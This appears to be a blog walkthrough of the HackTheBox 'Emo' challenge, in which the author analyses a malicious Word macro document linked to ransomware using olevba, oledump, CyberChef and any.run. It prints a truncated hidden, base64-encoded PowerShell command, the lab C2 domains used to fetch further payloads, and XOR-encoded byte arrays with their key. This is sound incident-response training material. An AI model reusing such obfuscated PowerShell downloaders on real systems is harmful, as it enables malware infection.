We covered analyzing an office document that has an embedded Macro code written in Visual Basic. The document was claimed to cause ransomware infection so we performed a static analysis including extracting relevant strings, calculating the MD5 hash, metadata and revealing the hidden Macro routine using tools such as olevba. Then we submitted the hash to online analysis engines such as VirusTotal and it was found to be malicious in that it executes a Powershell command that contacts c2 server to download further payloads. We also found instances of XOR encryption along with the XOR key which then used to decrypt a characters that were encoded previously into decimal form. This was part of HackTheBox Emo challenge.

Get OSCP Certificate Notes

The Complete Practical Web Application Penetration Testing Course

Challenge Description

WearRansom ransomware just got loose in our company. The SOC has traced the initial access to a phishing attack, a Word document with macros. Take a look at the document and see if you can find anything else about the malware and perhaps a flag.

Video Highlights

In this video, we  take on the shoes of an incident responder and analyze a malicious office word document that contains a malicious Macro code that executes Powershell that performs some XOR encryption and calls command and control server to drop more payloads on the infected machine. So basically we’re going to isolate the infected machine, cut off the internet and clone it for analysis.

So first thing we’re gonna start with a static malware analysis by executing several commands such as extracting relevant strings from the sample, calculating the MD5 hash and extracting the Macro routines using some tools such as olevba and oledump.py

The Macro routine contains the commands and the payloads that are executed on the machine including the Powershell command. After the static analysis, we perform the dynamic analysis that reveals the processes spawned, network connections, registry keys modified and the events triggered. Additionally you have to consider the timestamp when looking up the events in Event Viewer. So if you opened during the dynamic analysis, let’s say opened the malicious document at 19:35 pm you are gonna have to use this time and filter the events that were triggered exactly at the specified timestamp.

The dynamic analysis report of this sample can be found on any.run

Some of the domains the sample communicated with are below

da-industrial.htb
daprofesional.htb
www.outspokenvisions.htb
dagranitegiare.htb
mobsouk.htb
biglaughs.htb
ngllogistics.htb

Below is the Powershell command that is revealed from the dynamic analysis report

POwersheLL -windowstyle hidden -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AIgAtAGYAIAAnAGUAJwAsACcAcgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC4ASQBPA

The above powershell command will be decoded using Cyberchef using frombase64 and remove null bytes.  This will give you the full payload from which we can highlight the below variable declarations:

$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)

$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)

$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)

If we use chardecode and use decimal in Cyberchef it wil give us an encrypted string with XOR for which the key is 0xdf which can be found in the line that highlights the below in the original payload after decoding it in Cyberchef.

+= ([byte][char]${_} -bxor 0xdf )

Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles